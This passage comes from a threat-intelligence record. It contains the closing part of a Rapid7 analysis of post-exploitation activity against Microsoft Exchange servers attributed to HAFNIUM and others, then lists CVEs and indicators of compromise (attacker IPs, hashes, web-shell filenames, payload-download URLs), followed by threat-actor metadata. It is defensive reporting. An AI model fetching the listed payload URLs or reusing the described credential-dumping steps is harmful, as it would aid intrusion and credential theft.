as the gathered credentials remain unchanged.\r\nThis dumping of credentials may have been done at this scale because the attackers were aware the activity would be discovered and the vulnerability patched very soon. The harvested credentials would potentially allow these attackers to continue to access these accounts even after the systems had been successfully patched. 
The escalation from use by HAFNIUM to subsequent use by several other actors may point to the same exploit being shared or leaked. At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.\r\nContinuing to analyze the behavior of attackers post-compromise and developing detections from it greatly increases the likelihood of being notified of a breach, regardless of the method used to obtain initial access to the victim environment. Additionally, these behavioral detections have longer lifespans and can be made available sooner than most indicators of compromise shared in other types of public reporting.\r\nObserved CVEs employed by attackers:\r\nCVE - Description - Reference\r\nCVE-2018-18913 - Opera Search Order Hijacking Vulnerability - https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html\r\nCVE-2021-26855 - Microsoft Exchange Server remote code execution - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855\r\nCVE-2021-26857 - Microsoft Exchange Server remote code execution - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857\r\nCVE-2021-26858 - Microsoft Exchange Server remote code execution - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858\r\nCVE-2021-27065 - Microsoft Exchange Server remote code execution - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065\r\nObserved IOCs employed by all attackers:\r\nType Value\r\nFQDN estonine.com\r\nFQDN p.estonine.com\r\nFQDN ipinfo.io\r\nFilepath C:\\inetpub\\wwwroot\\aspnet_client\\\r\nFilepath 
C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\\r\nFilepath C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\\r\nFilepath c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\\r\nFilepath C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\\r\nFilepath C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\\r\nFilepath C:\\Programdata\\\r\nFilepath C:\\ProgramData\\COM\\zfwqn\\\r\nFilepath C:\\root\\\r\nFilepath C:\\Users\\Public\\\r\nFilepath C:\\Users\\Public\\Opera\\\r\nFilepath C:\\Windows\\temp\\\r\nFilename 1.txt\r\nFilename 2.bat\r\nFilename 3.avi\r\nFilename b.log\r\nFilename c103w-at.zip\r\nFilename client32.exe\r\nFilename code\r\nFilename curl.exe\r\nFilename demo.dll\r\nFilename discover.aspx\r\nFilename dsf.exe\r\nFilename error.aspx\r\nFilename ErrorFF.aspx\r\nFilename exshell.psc1\r\nFilename Flogon.aspx\r\nFilename lsass.dump\r\nFilename m103w.zip\r\nFilename nvidia.msi\r\nFilename opera_browser.dll\r\nFilename opera_browser.exe\r\nFilename opera_browser.png\r\nFilename OutlookEN.aspx\r\nFilename MonitoringLog.cmd\r\nFilename MonitoringLog.exe\r\nFilename p\r\nFilename procdump64.exe\r\nFilename Service.Information.rtf\r\nFilename TimeoutLogout.aspx\r\nFilename script1.ps1\r\nFilename test.bat\r\nIP Address 178.162.217.107\r\nIP Address 178.162.203.202\r\nIP Address 178.162.203.226\r\nIP Address 85.17.31.122\r\nIP Address 5.79.71.205\r\nIP Address 5.79.71.225\r\nIP Address 178.162.203.211\r\nIP Address 85.17.31.82\r\nIP Address 86.105.18.116\r\nIP Address 198.98.61.152\r\nIP Address 89.34.111.11\r\nMD5 7a6c605af4b85954f62f35d648d532bf\r\nMD5 e1ae154461096adb5ec602faad42b72e\r\nMD5 b3df7f5a9e36f01d0eb0043b698a6c06\r\nMD5 c60ac6a6e6e582ab0ecb1fdbd607705b\r\nMD5 42badc1d2f03a8b1e4875740d3d49336\r\nMD5 c515107d75563890020e915f54f3e036\r\nSHA1 02886f9daa13f7d9855855048c54f1d6b1231b0a\r\nSHA1 c7f68a184df65e72c59403fb135924334f8c0ebd\r\nSHA1 ab32d4ec424b7cd30c7ace1dad859df1a65aa50e\r\nSHA1 ba9de479beb82fd97bbdfbc04ef22e08224724ba\r\nSHA1 cee178da1fb05f99af7a3547093122893bd1eb46\r\nSHA1 2fed891610b9a770e396ced4ef3b0b6c55177305\r\nSHA-256 b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff\r\nSHA-256 d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09\r\nSHA-256 bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6\r\nSHA-256 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87\r\nSHA-256 c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf\r\nSHA-256 076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26\r\nURL http://103.212.223.210:9900/nvidia.msi\r\nURL http://86.105.18.116/news/code\r\nURL http://86.105.18.116/news/opera_browser.dll\r\nURL http://86.105.18.116/news/opera_browser.exe\r\nURL http://86.105.18.116/news/opera_browser.png\r\nURL http://89.34.111.11/3.avi\r\nURL http://microsoftsoftwaredownload.com:8080/c103w-at.zip\r\nURL http://microsoftsoftwaredownload.com:8080/m103w.zip\r\nURL http://p.estonine.com/p?e\r\nURL http://\u003cREDACTED_HOSTNAME\u003e/owa/auth/ /zfwqn\r\nURL http://\u003cREDACTED_HOSTNAME\u003e/owa/auth/%20/zfwqn\r\nReferences:\r\nhttps://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\r\nhttps://aka.ms/ExchangeVulns\r\nhttps://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html\r\nhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf\r\nSource: https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/"
	],
	"report_names": [
		"defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7c969685-459b-4c93-a788-74108eab6f47",
			"created_at": "2023-01-06T13:46:39.189751Z",
			"updated_at": "2026-04-10T02:00:03.241102Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"Red Dev 13",
				"Silk Typhoon",
				"MURKY PANDA",
				"ATK233",
				"G0125",
				"Operation Exchange Marauder"
			],
			"source_name": "MISPGALAXY:HAFNIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2704d770-43b4-4bc4-8a5a-05df87416848",
			"created_at": "2022-10-25T15:50:23.306305Z",
			"updated_at": "2026-04-10T02:00:05.296581Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"HAFNIUM",
				"Operation Exchange Marauder",
				"Silk Typhoon"
			],
			"source_name": "MITRE:HAFNIUM",
			"tools": [
				"Tarrask",
				"ASPXSpy",
				"Impacket",
				"PsExec",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "529c1ae9-4579-4245-86a6-20f4563a695d",
			"created_at": "2022-10-25T16:07:23.702006Z",
			"updated_at": "2026-04-10T02:00:04.71708Z",
			"deleted_at": null,
			"main_name": "Hafnium",
			"aliases": [
				"G0125",
				"Murky Panda",
				"Red Dev 13",
				"Silk Typhoon"
			],
			"source_name": "ETDA:Hafnium",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439058,
	"ts_updated_at": 1775826695,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4dac904aa52be16139e9c7ef8337ecf9c4658b25.pdf",
		"text": "https://archive.orkl.eu/4dac904aa52be16139e9c7ef8337ecf9c4658b25.txt",
		"img": "https://archive.orkl.eu/4dac904aa52be16139e9c7ef8337ecf9c4658b25.jpg"
	}
}